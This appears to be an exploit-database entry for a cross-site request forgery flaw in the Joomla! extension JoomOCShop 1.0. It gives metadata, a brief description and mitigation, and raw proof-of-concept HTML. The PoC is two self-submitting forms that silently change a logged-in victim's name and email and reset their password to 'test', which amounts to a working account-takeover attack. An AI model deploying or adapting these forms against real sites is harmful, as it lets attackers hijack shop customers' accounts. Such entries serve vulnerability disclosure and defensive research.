Joomla! extension JoomOCShop 1.0 - Cross site request forgery

vendor:

JoomOCShop

by:

L0RD

5.5

CVSS

MEDIUM

Cross site request forgery

Cross-Site Request Forgery (CSRF)

CWE

Product Name: JoomOCShop

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:joomlacommunity:joomocshop:1.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2018

Joomla! extension JoomOCShop 1.0 – Cross site request forgery

This exploit allows an attacker to change user information and passwords in the Joomla! extension JoomOCShop 1.0. The attacker can modify the user's firstname, lastname, email, telephone, and fax. Another exploit allows the attacker to change the user's password.

Mitigation:

Apply the latest patch or update to the Joomla! extension JoomOCShop. Implement proper input validation and authentication mechanisms to prevent CSRF attacks.

Source

Exploit-DB raw data:

# Exploit Title: Joomla! extension JoomOCShop 1.0 - Cross site request forgery
# Date: 2018-05-28
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/joomocshop/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 1.0
# Tested on: Kali linux
===================================================

# POC :

# Change user information exploit :

<html>
  <body>
    <form action="http://site.com/joomoc2/?route=account/edit" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="firstname" value="decode" />
      <input type="hidden" name="lastname" value="revenge" />
      <input type="hidden" name="email" value="decod3&#46;n&#64;gmail&#46;com" />
      <input type="hidden" name="telephone" value="100000" />
      <input type="hidden" name="fax" value="&#13;" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>


# Change password exploit :

<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="password" value="test" />
      <input type="hidden" name="confirm" value="test" />
</form>
<script>
   document.forms[0].submit();
</script>

====================================================